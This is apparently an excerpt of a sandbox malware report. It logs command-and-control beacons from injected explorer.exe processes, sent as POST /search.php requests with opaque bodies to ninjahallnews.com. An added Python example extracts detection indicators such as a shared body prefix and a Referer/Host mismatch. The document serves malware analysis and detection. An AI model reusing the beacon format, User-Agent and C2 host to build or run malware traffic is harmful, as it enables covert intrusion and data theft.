Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 50030 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:34 UTC | 285 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://hqstyqadnnvm.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 333
Host: ninjahallnews.com
2024-10-08 01:15:34 UTC | 333 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 57 fe 16 fd ba eb 11 28 dc 1e 6c e4 55 f8 90 01 06 cd 0a 28 3d c7 da fe 48 cb ee 11 4f 9d 82 7c e4 51 51 f2 d4 70 7f 23 4b 42 21 c6 2d db da c0 03 e9 e4 40 00 2f 96 02 5a f2 51 46 84 e5 e9 c3 07 04 cb 0d db 6f af 73 26 bc 51 ce 26 5d 4b 1e 1d f9 d2 11 81 9d 7e e1 1a 3c 85 c3 cd 48 e3 ee 7b ec de fa de 18 5d 8f 82 96 6d 51 af 6e 38 98 32 4c 15 b0 41 78 63 b8 46 7f 5e 86 bb d5 67 23 cb e0 7b 95 5c c1 b6 f5 00 66 00 2e c9 6c 1d 7c 2a 0e a7 56 b8 a4 69 28 6b 59 54 8b 80 57 40 22 51 92 91 96 2b e7 ad 2d ce 27 a9 ab d7 b3 44 87 57
Data Ascii: rmh9/2p6 )6IP g3iqH[@Lz4%<W(lU(=HO|QQp#KB!-@/ZQFos&Q&]K~<H{]mQn82LAxcF^g#{\f.l|*Vi(kYTW@"Q+-'DW
2024-10-08 01:15:35 UTC | 294 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:15:35 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=utf-8
Connection: close
Transfer-Encoding: chunked
2024-10-08 01:15:35 UTC | 7898 | IN | Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 5b 8a 82 ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU[44A:F=
2024-10-08 01:15:35 UTC | 19 | IN | Data Raw: 1a 58 b3 14 d0 ff ef 1b ab d5 44 9d a9 19 24 1b 3c de a6
Data Ascii: XD$<
2024-10-08 01:15:35 UTC | 2 | IN | Data Raw: 0d 0a
Data Ascii:
2024-10-08 01:15:35 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
2024-10-08 01:15:35 UTC | 6 | IN | Data Raw: 4e 13 8c ae b0 c7
Data Ascii: N
2024-10-08 01:15:35 UTC | 2 | IN | Data Raw: 0d 0a
Data Ascii:
2024-10-08 01:15:35 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a 37 b0 80 d9 81 f6 4b 57 1e 8f 04 5f c4 c0 88 47 ee 18 f5 d8 ff a1 a2 c6 ae 36 1a 9d e0 fb 7a 50 95 22 b5 51 4d 25 b1 f4 18 0c 15 d1 06 0a 15 7b 23 d8 b9 63 41 09 53 8b 61 24 04 92 dd b9 c9 34 db 29 b1 d3 b5 7d 9b b6 ff 21 7f 68 a3 a1 98 ca f2 df ce 52 bb f4 67 4b 05 db df 01 f6 41 65 c4 8c 63 3c 95 b8 4a 79 8f 0e fc ec 98 91 1c 6c 75 27 c8 43 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 67 b6 ef 85 11 52 c9 bf 4e b0 d6 66 9d d8 30 3f 8d 93 5a f5 d5 f3 5f 31 3d a5 2e 45 85 49 21 aa 61 86 37 f7 f5 9a 70 4c 4d f9 1c fb e1 fe d1 ee cb fa 02 71 1e 89 dd 8a 35
Data Ascii: 20007KW_G6zP"QM%{#cASa$4)}!hRgKAec<Jylu'CUfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"vgRNf0?Z_1=.EI!a7pLMq5
2024-10-08 01:15:35 UTC | 6 | IN | Data Raw: eb 47 a6 2d 95 51
Data Ascii: G-Q
2024-10-08 01:15:35 UTC | 2 | IN | Data Raw: 0d 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 50036 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:36 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://hlglmlpnwcq.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 254
Host: ninjahallnews.com
2024-10-08 01:15:36 UTC | 254 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 7a 34 01 83 b6 25 93 3c 26 b2 0b f2 af ce 24 16 e1 12 6e bc 5e e9 ea 2d 67 f7 0f 10 63 ca b8 93 57 e5 f6 5a 70 d7 eb 38 88 45 72 ba 80 6f 1f 67 01 04 2a 91 08 97 94 d0 47 8d 95 5e 30 56 a0 16 27 c7 34 02 fb e5 bf b1 47 3a 94 73 c1 27 ee 0c 22 c8 25 de 38 6a 27 35 50 ed cc 13 85 d6 3a ee 15 17 c9 cc 86 39 bf b8 4f f4 a3 f1 96 29 56 81 be de 56 43 a9 0c 47 e4 0e 0c 51 8a 32 2e 4f f2 33 78 26 d9 96 db 62 60 99 e5 09 f3 7e d0 f2 c6 72 0c 6d 52 f3 43 0d 5f 55 69 b2 54 fb df 2b 39 75 6f 01 84 f6 58 79 28 04 ab f3 c0 5f 87 c0 68 c0 72 cb b4 e6 db 68 ff
Data Ascii: rmh9/2p6 )6IP g3iqH[ALz4%<&$n^-gcWZp8Erog*G^0V'4G:s'"%8j'5P:9O)VVCGQ2.O3x&b`~rmRC_UiT+9uoXy(_hrh
2024-10-08 01:15:36 UTC | 287 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:15:36 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 409
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:15:36 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 50043 | 23.145.40.168 | 443 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:37 UTC | 288 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://xuoelobbpmbhamy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 215
Host: ninjahallnews.com
2024-10-08 01:15:37 UTC | 215 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34 01 83 b7 25 93 3c 45 d5 00 9a dc ec 20 2e f3 23 18 9f 5d e7 d1 28 1e c6 03 03 7e a6 cb 94 4e e1 ce 12 19 d7 f0 74 f5 47 7f bd 8d 10 74 4e 19 5a 21 93 39 c5 d6 c0 35 f4 ac 59 08 1e 85 67 5e b2 2a 5e 81 cd f7 9b 33 24 a6 6e b0 52 9d 68 44 9d 1c 98 3d 5a 42 6d 5e ce f1 18 84 be 0d db 47 3d e5 d0 d2 4c e5 ec 1a b4 a2 8b a0 38 48 a6 8d df 08 30 94 1f 07 c9 73 15 1f a7 35 1e 60 c3 55 60 03 98 b1 c6 34 29 9d c9 0d e3 28 86 e1 b2 5f
Data Ascii: rmh9/2p6 )6IP g3iqH[@L{4%<E .#](~NtGtNZ!95Yg^*^3$nRhD=ZBm^G=L8H0s5`U`4)(_
2024-10-08 01:15:38 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:15:37 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 50055 | 23.145.40.168 | 443 | 6796 | C:\Windows\SysWOW64\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:15:43 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://ninjahallnews.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 4431
Host: ninjahallnews.com
2024-10-08 01:15:43 UTC | 4431 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 5d cf 27 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 60 11 1a eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c ad ca 1d f6 1b 3c ec e1 bd 3a dd bf 5a 9c b9 91 a3 17 4e b1 d1 85 6a 24 b5 69 28 ed 0f 51 1e 91 2c 13 4f cb 21 37 3f 85 b8 db 25 42 8a fa 4d c6 42 99 f8 cf 13 08 0e 56 c3 1d 01 49 29 2d d7 2c 8d b5 13 36 13 26 14 e7 87 25 58 0f 3d aa ea 9e 23 d7 ce 20 e3 7a 96 a0 c8 a9 79 86 4f
Data Ascii: rmh9/2p6nluIP g3@ZFLj4%<]'*%Qg3FIvw]3-jG`i".A9&FiVbT ?TKLu|<:ZNj$i(Q,O!7?%BMBVI)-,6&%X=# zyO
2024-10-08 01:15:43 UTC | 287 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:15:43 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 409
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:15:43 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


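The sessions in this stretch of the report share a few traits that are visible without decoding anything: every request is a POST to /search.php on ninjahallnews.com (23.145.40.168:443) from an injected explorer.exe, the User-Agent is the same Trident/7.0 string throughout, the Referer names a different random-looking .org/.net domain in every session except 20 (where it matches the Host), and each POST body opens with the same 43 bytes, with the five beacons from PID 2580 sharing their first 68. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample; it transcribes those fields from the tables on this page, keeps only the first 72 bytes of each body, and computes the shared body prefix and the Referer/Host mismatch so they can be carried into a content or proxy-log rule. The Beacon record, the summarize function and the 72-byte truncation are the example's own choices; the body format is left undecoded because the report does not describe it.

```python
"""Added example (not from the Joe Sandbox report): structure the C2 sessions
shown on this page and extract the indicators a detection engineer would key on.

Field values are transcribed from the report's session tables. Each POST body
is truncated to its first 72 bytes here (the report prints longer dumps); the
body format itself is not decoded because the report does not describe it.
"""
from dataclasses import dataclass
from urllib.parse import urlparse

# Same User-Agent in every beacon on the page.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


@dataclass(frozen=True)
class Beacon:
    session: int
    pid: int
    process: str
    host: str            # Host header of the POST
    referer: str         # Referer header of the POST
    content_length: int  # Content-Length header (full body size)
    body: bytes          # first 72 bytes of the POST body, from the report


def _b(hexdump: str) -> bytes:
    return bytes.fromhex(hexdump)


# Transcribed from sessions 16-21 (bodies truncated to 72 bytes).
BEACONS = [
    Beacon(16, 2580, r"C:\Windows\explorer.exe", "ninjahallnews.com", "https://oriixfynfaeoogt.org/", 211,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34")),
    Beacon(17, 2580, r"C:\Windows\explorer.exe", "ninjahallnews.com", "https://hqstyqadnnvm.org/", 333,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34")),
    Beacon(18, 2580, r"C:\Windows\explorer.exe", "ninjahallnews.com", "https://hlglmlpnwcq.org/", 254,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 7a 34")),
    Beacon(19, 2580, r"C:\Windows\explorer.exe", "ninjahallnews.com", "https://xuoelobbpmbhamy.org/", 215,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7b 34")),
    Beacon(20, 6796, r"C:\Windows\SysWOW64\explorer.exe", "ninjahallnews.com", "https://ninjahallnews.com/", 4431,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34")),
    Beacon(21, 2580, r"C:\Windows\explorer.exe", "ninjahallnews.com", "https://qotplnnnyldonj.net/", 109,
           _b("72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34")),
]


def common_prefix_len(blobs):
    """Number of leading bytes shared by every blob (0 for an empty list)."""
    n = 0
    for column in zip(*blobs):          # walk the blobs one offset at a time
        if len(set(column)) != 1:       # first offset where any blob differs
            break
        n += 1
    return n


def shared_prefix(beacons):
    """The byte string every beacon body starts with."""
    bodies = [b.body for b in beacons]
    return bodies[0][:common_prefix_len(bodies)] if bodies else b""


def referer_host_mismatch(b):
    """True when the Referer names a different host than the Host header."""
    return urlparse(b.referer).hostname != b.host


def summarize(beacons):
    """Indicators worth carrying into a detection, keyed so they can be checked."""
    by_pid = {}
    for b in beacons:
        by_pid.setdefault(b.pid, []).append(b.body)
    return {
        "hosts": sorted({b.host for b in beacons}),
        "referer_domains": sorted(urlparse(b.referer).hostname for b in beacons),
        "referer_mismatch": [b.session for b in beacons if referer_host_mismatch(b)],
        "shared_prefix_all": common_prefix_len([b.body for b in beacons]),
        "shared_prefix_by_pid": {pid: common_prefix_len(v) for pid, v in by_pid.items()},
        "largest_body": max(beacons, key=lambda b: b.content_length).session,
    }


if __name__ == "__main__":
    for key, value in summarize(BEACONS).items():
        print(f"{key}: {value}")
    print("shared prefix:", shared_prefix(BEACONS).hex(" "))
```

Two caveats before turning the output into a rule. The 43-byte prefix is an observation over six captures of one sample, not a validated signature, and the shorter 68-byte overlap inside PID 2580 shows the bodies are not fixed beyond that point, so a content match should be anchored on the shortest prefix and paired with the request shape (POST /search.php, this User-Agent, Referer host differing from Host) rather than used alone. The Referer/Host mismatch is the weaker indicator on its own; session 20, the 4431-byte body sent from the 32-bit explorer.exe, has no mismatch at all.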
Session ID:21
Source IP:192.168.2.4
Source Port:50060
Destination IP:23.145.40.168
Destination Port:443
PID:2580
Process:C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:16:57 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://qotplnnnyldonj.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
2024-10-08 01:16:57 UTC | 109 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 01:16:57 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:16:57 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:16:57 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d ae
Data Ascii:


Session ID:22
Source IP:192.168.2.4
Source Port:50061
Destination IP:23.145.40.168
Destination Port:443
PID:2580
Process:C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:16:58 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://cubjgioqceo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 241
Host: ninjahallnews.com
2024-10-08 01:16:58 UTC | 241 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6a 34 01 83 b7 25 93 3c 2c a5 22 ba c8 c1 04 0f ee 0b 6b f0 20 fe 94 7d 65 b1 70 3c 3f c8 b6 e2 2b d3 f1 72 51 f1 88 77 96 53 6e ed e1 6a 1f 47 5a 36 26 8f 33 8a fa 9c 0b d2 9a 52 20 30 99 13 35 af 59 1b c5 ed e8 c1 14 2e 89 5b b8 34 f3 2d 62 a4 08 d6 77 7d 6d 7a 5f db f3 0e af a4 3e 99 3d 68 fa a0 b9 5d c8 b7 6d f4 a6 9f bd 05 69 cc a7 9e 09 14 93 55 23 e8 10 16 1e b4 2e 1d 25 b4 28 71 5f 8a a6 fb 22 55 93 ef 62 ff 4e d9 bc b3 7d 6b 73 47 be 14 1e 72 1f 22 d9 0f f1 da 6a 00 01 61 29 db e6 39 20 2a 1d c5 a7
Data Ascii: rmh9/2p6 )6IP g3iqH[@Lj4%<,"k }ep<?+rQwSnjGZ6&3R 05Y.[4-bw}mz_>=h]miU#.%(q_"UbN}ksGr"ja)9 *
2024-10-08 01:16:58 UTC | 278 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 01:16:58 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 0
Content-Type: text/html; charset=utf-8
Connection: close


Session ID:23
Source IP:192.168.2.4
Source Port:50063
Destination IP:23.145.40.168
Destination Port:443
PID:2580
Process:C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:17:16 UTC | 284 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://jcipjgavjhg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
2024-10-08 01:17:16 UTC | 109 | OUT | Data Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6b 34 01 83 b6 25 93 3c 32 a9 65 e1 d2 fe 51 00 be 76 62 b5 25 c5 93 3b 3d b8 6a 01 20 c8 ea d4 2c be a9 07 02 86 d4
Data Ascii: rmh9/2p6 )6IP g3iqH[CLk4%<2eQvb%;=j ,
2024-10-08 01:17:16 UTC | 285 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 01:17:16 GMT
Server: Apache/2.4.52 (Ubuntu)
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Length: 7
Content-Type: text/html; charset=utf-8
Connection: close
2024-10-08 01:17:16 UTC | 7 | IN | Data Raw: 03 00 00 00 1e 0d af
Data Ascii:


Session ID:24
Source IP:192.168.2.4
Source Port:50065
Destination IP:23.145.40.168
Destination Port:443
PID:2580
Process:C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:17:34 UTC | 287 | OUT | POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://qdnfexfeugqvww.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 109
Host: ninjahallnews.com
